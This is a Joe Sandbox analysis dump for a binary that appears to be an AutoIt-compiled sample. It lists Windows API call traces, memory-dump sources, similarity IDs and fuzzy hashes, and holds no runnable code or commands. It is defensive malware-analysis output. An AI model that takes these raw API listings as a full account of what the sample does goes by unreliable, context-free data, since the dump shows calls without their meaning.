• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0052E1D8
• ReleaseDC.USER32(00000000,00000000), ref: 0052E1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0052E1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 0052E209
  • Part of subcall function 00529AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00529A05,00000000,00000000,?,00529DDB), ref: 0052A53A
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• API String ID: 603618608-0
APIs
• __init_pointers.LIBCMT ref: 00517B47
  • Part of subcall function 0051123A: __initp_misc_winsig.LIBCMT ref: 0051125E
  • Part of subcall function 0051123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00517F51
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00517F65
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00517F78
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00517F8B
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00517F9E
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00517FB1
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00517FC4
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00517FD7
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00517FEA
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00517FFD
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00518010
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00518023
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00518036
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00518049
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0051805C
  • Part of subcall function 0051123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0051806F
• __mtinitlocks.LIBCMT ref: 00517B4C
  • Part of subcall function 00517E23: InitializeCriticalSectionAndSpinCount.KERNEL32(005AAC68,00000FA0,?,?,00517B51,00515E77,005A6C70,00000014), ref: 00517E41
• __mtterm.LIBCMT ref: 00517B55
  • Part of subcall function 00517BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00517B5A,00515E77,005A6C70,00000014), ref: 00517D3F
  • Part of subcall function 00517BBD: _free.LIBCMT ref: 00517D46
  • Part of subcall function 00517BBD: DeleteCriticalSection.KERNEL32(005AAC68,?,?,00517B5A,00515E77,005A6C70,00000014), ref: 00517D68
• __calloc_crt.LIBCMT ref: 00517B7A
• GetCurrentThreadId.KERNEL32 ref: 00517BA3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                  • String ID:
                                                                                  • API String ID: 2942034483-0
                                                                                  • Opcode ID: c0bdab1028dc499002976513d80085204c72241f6ac861ff047d1d0300e04dee
                                                                                  • Instruction ID: 7aadbc465707f64fe4e8e0c596dba6e6e40add4575b72a402afbc7d553cd5d3e
                                                                                  • Opcode Fuzzy Hash: c0bdab1028dc499002976513d80085204c72241f6ac861ff047d1d0300e04dee
                                                                                  • Instruction Fuzzy Hash: F4F0963251D71B19F664773C7C4AACA2EF4BF4A730B204799F864C60D1FF2588C29165
                                                                                  APIs
                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004F281D
                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 004F2825
                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004F2830
                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004F283B
                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 004F2843
                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004F284B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual
                                                                                  • String ID:
                                                                                  • API String ID: 4278518827-0
                                                                                  • Opcode ID: dba0a3a6addc934d0174a26e9b6ccfbde98483e75ee8c06a387959607df5f3ae
                                                                                  • Instruction ID: b65747fbd2468064c80dac485b91d4208c08c80bf2c162bdefea8fff76b1b5c5
                                                                                  • Opcode Fuzzy Hash: dba0a3a6addc934d0174a26e9b6ccfbde98483e75ee8c06a387959607df5f3ae
                                                                                  • Instruction Fuzzy Hash: 0F0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F00411BA15C47A42C7F5A868CBE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 1423608774-0
                                                                                  • Opcode ID: d631eeb57d5a01edb3fb7f478f1f370657e003eb5e985534c93e78f107ebee58
                                                                                  • Instruction ID: 7881535b85d9bc1aa20ab429275e4ef6736efcffcd7113ee63a20d7c0f50ec46
                                                                                  • Opcode Fuzzy Hash: d631eeb57d5a01edb3fb7f478f1f370657e003eb5e985534c93e78f107ebee58
                                                                                  • Instruction Fuzzy Hash: 1201D17A102212ABD7141B94FC48DFB7B7AFF98301B040529F507A20A1DBB49845FB70
                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00537C07
                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00537C1D
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00537C2C
                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00537C3B
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00537C45
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00537C4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 839392675-0
                                                                                  • Opcode ID: 6b2139014f1ab6de2b3ffa5764b0298957548ba6cf7a6b8963421673ae637120
                                                                                  • Instruction ID: 830af8c3d060346433d068c556f240cfa710836930e3fc7dd06fa33078a4ca2c
                                                                                  • Opcode Fuzzy Hash: 6b2139014f1ab6de2b3ffa5764b0298957548ba6cf7a6b8963421673ae637120
                                                                                  • Instruction Fuzzy Hash: 3DF03A72241158BBE7215B52AC0EEEF7F7CEFDAB11F000028FA0A91051D7A05A89F6B5
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00539A33
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 00539A44
                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 00539A51
                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 00539A5E
                                                                                    • Part of subcall function 005393D1: CloseHandle.KERNEL32(?,?,00539A6B,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 005393DB
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00539A71
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00565DEE,?,?,?,?,?,004FED63), ref: 00539A78
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 3495660284-0
                                                                                  • Opcode ID: 99a7a62115eb04993f525367da9794e879e195b04c7cf1a0a4359d69ccfa5adc
                                                                                  • Instruction ID: 646420237836167cad2e0d20f8ab8cb86c39e35598291cd03b53402bd0bee338
                                                                                  • Opcode Fuzzy Hash: 99a7a62115eb04993f525367da9794e879e195b04c7cf1a0a4359d69ccfa5adc
                                                                                  • Instruction Fuzzy Hash: F6F0BE7A141201ABD3111BA4FC8CDAB3B3AFF94301F040421F107A10B1DBB59846FB70
                                                                                  APIs
                                                                                    • Part of subcall function 0050F4EA: std::exception::exception.LIBCMT ref: 0050F51E
                                                                                    • Part of subcall function 0050F4EA: __CxxThrowException@8.LIBCMT ref: 0050F533
                                                                                  • __swprintf.LIBCMT ref: 004F1EA6
                                                                                  Strings
                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004F1D49
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                  • API String ID: 2125237772-557222456
                                                                                  • Opcode ID: 5c36fed9c41fc3b96fd07f86e17fd43ecf1bae625baed9921afce9a6fbba504a
                                                                                  • Instruction ID: ce7f0d3bcbd0f4321fbcfb614e8246efb07b0201975c7c6c16e814b4a046c949
                                                                                  • Opcode Fuzzy Hash: 5c36fed9c41fc3b96fd07f86e17fd43ecf1bae625baed9921afce9a6fbba504a
                                                                                  • Instruction Fuzzy Hash: 63916B721042099FCB24EF25C995C7EBBE4BF95704F00491EFA86972A1DB74ED04CB96
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 0054B006
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 0054B115
                                                                                  • VariantClear.OLEAUT32(?), ref: 0054B298
                                                                                    • Part of subcall function 00539DC5: VariantInit.OLEAUT32(00000000), ref: 00539E05
                                                                                    • Part of subcall function 00539DC5: VariantCopy.OLEAUT32(?,?), ref: 00539E0E
                                                                                    • Part of subcall function 00539DC5: VariantClear.OLEAUT32(?), ref: 00539E1A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                  • API String ID: 4237274167-1221869570
                                                                                  • Opcode ID: 87cfd1a7423f696e92273b7d2bc03c280af85473befc7941ff1484437f451a9f
                                                                                  • Instruction ID: ac8a0210b2701debf207f9ae6f44bebbf182160e14fa7fb5451348227e067a8d
                                                                                  • Opcode Fuzzy Hash: 87cfd1a7423f696e92273b7d2bc03c280af85473befc7941ff1484437f451a9f
                                                                                  • Instruction Fuzzy Hash: 92916C746083059FCB10DF24D4859AEBBF4BF89708F04486EF99A9B3A1DB31E945CB52
                                                                                  APIs
                                                                                    • Part of subcall function 0050C6F4: _wcscpy.LIBCMT ref: 0050C717
                                                                                  • _memset.LIBCMT ref: 00535438
                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00535467
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00535513
                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0053553D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                  • String ID: 0
                                                                                  • API String ID: 4152858687-4108050209
                                                                                  • Opcode ID: b87dcdcc4d91cf282437be3d8f753a07c58d15c7350dc7d78140ec20adbac8d1
                                                                                  • Instruction ID: 10d3177511be6655b0e3512b1ed0f91386a58c20597fc864bf87c4a281d1ceab
                                                                                  • Opcode Fuzzy Hash: b87dcdcc4d91cf282437be3d8f753a07c58d15c7350dc7d78140ec20adbac8d1
                                                                                  • Instruction Fuzzy Hash: 3B51F072104B019BD7159F28C8456BBBFE8FF85354F142A2EF896D3190FBA0ED448B52
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0053027B
                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 005302B1
                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 005302C2
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00530344
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                   • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                   • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                  • String ID: DllGetClassObject
                                                                                  • API String ID: 753597075-1075368562
                                                                                  • Opcode ID: 5a0a16d3bb380b80a04c1dd86325c1e740093ed9597abe5a9139227ab7ad45e1
                                                                                  • Instruction ID: c759e6f018778d39f46036f0db0401ddb40f9bc7e3bd1e4c5a18fa0e66493994
                                                                                  • Opcode Fuzzy Hash: 5a0a16d3bb380b80a04c1dd86325c1e740093ed9597abe5a9139227ab7ad45e1
                                                                                  • Instruction Fuzzy Hash: 46416AB1600304EFDB05CF54C8A5B9A7FB9FF84310F1494A9A9099F286D7B1DA44DBA1
APIs
• _memset.LIBCMT ref: 00535075
• GetMenuItemInfoW.USER32 ref: 00535091
• DeleteMenu.USER32(00000004,00000007,00000000), ref: 005350D7
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005B1708,00000000), ref: 00535120
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
• Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: f8bb20999967808bac87a51a52c7068ad00badcf54064a14a9187b4cfc003396
• Instruction ID: 5fba02eb8991001b8f04f32634cd15e16350a1b39afa9883d19a2018be4eda86
• Opcode Fuzzy Hash: f8bb20999967808bac87a51a52c7068ad00badcf54064a14a9187b4cfc003396
• Instruction Fuzzy Hash: 9241C2752047029FD720DF24D884B6ABBE4BF85324F145A1EF99597291E730E944CB62
APIs
• CharLowerBuffW.USER32(?,?,?,?), ref: 00550587
Strings
Similarity
• API ID: BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 2358735015-567219261
• Opcode ID: d1b7e4ebb6e84bac9a394f2183af474042005142236b59af33a2390bee88ace7
• Instruction ID: 2384d52207522b6682f2e355e8cb96382cbe92c30cbbd3ecba688521f707c740
• Opcode Fuzzy Hash: d1b7e4ebb6e84bac9a394f2183af474042005142236b59af33a2390bee88ace7
• Instruction Fuzzy Hash: 2431B47050011AAFCF00EF54C9519FEBBB4FF55314B104A2EE825A72D1DB71E915CB90
APIs
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0052B88E
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0052B8A1
• SendMessageW.USER32(?,00000189,?,00000000), ref: 0052B8D1
Strings
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: a70a978de7150e22d72619c6095e67e87482c883f77081cb3bb74a0cda3bfac4
• Instruction ID: 0191f6b81e4ab5fe5d035282282f8cff0e96ab1f4085d8f7ed32ecfa6e519296
• Opcode Fuzzy Hash: a70a978de7150e22d72619c6095e67e87482c883f77081cb3bb74a0cda3bfac4
• Instruction Fuzzy Hash: DE21F376A00108BFEB14AB64EC86DFE7BBCEF46354B10412DF529A31E1DB785D0A9760
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00544401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00544427
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00544457
• InternetCloseHandle.WININET(00000000), ref: 0054449E
  • Part of subcall function 00545052: GetLastError.KERNEL32(?,?,005443CC,00000000,00000000,00000001), ref: 00545067
Strings
Similarity
• API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 1951874230-3916222277
• Opcode ID: 479fc0efdd6e02d6491ae5d796d4caa73fa28897ee926502e527e49336ad80cc
• Instruction ID: 852c56db7bedff0cd7fc306e2c25fae9f1fec34e8c9494e4c91b4727804e6385
• Opcode Fuzzy Hash: 479fc0efdd6e02d6491ae5d796d4caa73fa28897ee926502e527e49336ad80cc
• Instruction Fuzzy Hash: 5C21AFB5540608BFEB119F649C89FFFBAFCFF88758F10841AF109A2140EA648D45AB70
APIs
  • Part of subcall function 0050D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0050D1BA
  • Part of subcall function 0050D17C: GetStockObject.GDI32(00000011), ref: 0050D1CE
  • Part of subcall function 0050D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0050D1D8
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0055915C
• LoadLibraryW.KERNEL32(?), ref: 00559163
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00559178
• DestroyWindow.USER32(?), ref: 00559180
Strings
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
• Opcode ID: 2e0fdbf260d14ba9bad8c6b150be797b5cf719e337a6b166fb5dcdf538e5012e
• Instruction ID: d67e2d38ed1beee11524ee8761e16d0fbc9990c11faf91e17823e20ce9a88ea8
• Opcode Fuzzy Hash: 2e0fdbf260d14ba9bad8c6b150be797b5cf719e337a6b166fb5dcdf538e5012e
• Instruction Fuzzy Hash: CB218E71200616FBEF104E649CA8EFA3BB9FF99365F10061AFD1492190C779DC49E760
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00539588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005395B9
• GetStdHandle.KERNEL32(0000000C), ref: 005395CB
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00539605
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: b0e656bb983d0f79eeee037c95c8eae0a28a660a1a4e2163677b552db63822db
• Instruction ID: 8792228767842e28309fb03065a4309c6ceb66f1a64947c1225b8ccbada262f0
• Opcode Fuzzy Hash: b0e656bb983d0f79eeee037c95c8eae0a28a660a1a4e2163677b552db63822db
• Instruction Fuzzy Hash: 542192B1500206ABEB219F25DC05A9E7FF4BF95720F204A19F8A5D72D0D7B0D985DF20
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00539653
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00539683
• GetStdHandle.KERNEL32(000000F6), ref: 00539694
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005396CE
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 1185618a6f03514b6d45b4fb0910c6b61da192dd90474b597b2610732eb993f9
• Instruction ID: 8c68f025df25902db7018170b1daa688f128644c018d2f536f23f0be9aadfd54
• Opcode Fuzzy Hash: 1185618a6f03514b6d45b4fb0910c6b61da192dd90474b597b2610732eb993f9
• Instruction Fuzzy Hash: A72183B15012069BDB209F699C46E9ABBF8BF95734F200A19F8A1E72D0D7F0D845DB60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0053DB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0053DB5E
• __swprintf.LIBCMT ref: 0053DB77
• SetErrorMode.KERNEL32(00000000,00000001,00000000,0058DC00), ref: 0053DBB5
Strings
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: 48741b93212bfca9c6939c746c6fa77335aeb0207bc96af89cdd4834b4f413d5
• Instruction ID: 0423fcc123cba119ca75cb09c1336e13c170231a7aa27961a9af8649efce2497
• Opcode Fuzzy Hash: 48741b93212bfca9c6939c746c6fa77335aeb0207bc96af89cdd4834b4f413d5
• Instruction Fuzzy Hash: DD217135600109AFCB10EF65D985DAEBBB8FF89704B004069FA09E7251DB74EE45DB60
APIs
  • Part of subcall function 0052C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0052C84A
  • Part of subcall function 0052C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0052C85D
  • Part of subcall function 0052C82D: GetCurrentThreadId.KERNEL32 ref: 0052C864
  • Part of subcall function 0052C82D: AttachThreadInput.USER32(00000000), ref: 0052C86B
• GetFocus.USER32 ref: 0052CA05
  • Part of subcall function 0052C876: GetParent.USER32(?), ref: 0052C884
• GetClassNameW.USER32(?,?,00000100), ref: 0052CA4E
• EnumChildWindows.USER32(?,0052CAC4), ref: 0052CA76
• __swprintf.LIBCMT ref: 0052CA90
Strings
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
• String ID: %s%d
• API String ID: 3187004680-1110647743
• Opcode ID: 976d506577417f79d12e59f4911a17ef5e05f5bdd87348ede2b1199a41202f94
• Instruction ID: bb9f473e45c05d4caa6a67ca425435f9f7c8c0afc11b24cc33f053cc8df58a04
• Opcode Fuzzy Hash: 976d506577417f79d12e59f4911a17ef5e05f5bdd87348ede2b1199a41202f94
• Instruction Fuzzy Hash: 921190715002196BCB01BF60AC89FAD3F78BF96704F008066FE09AA1C3DB749945DB71
APIs
• __lock.LIBCMT ref: 00517AD8
  • Part of subcall function 00517CF4: __mtinitlocknum.LIBCMT ref: 00517D06
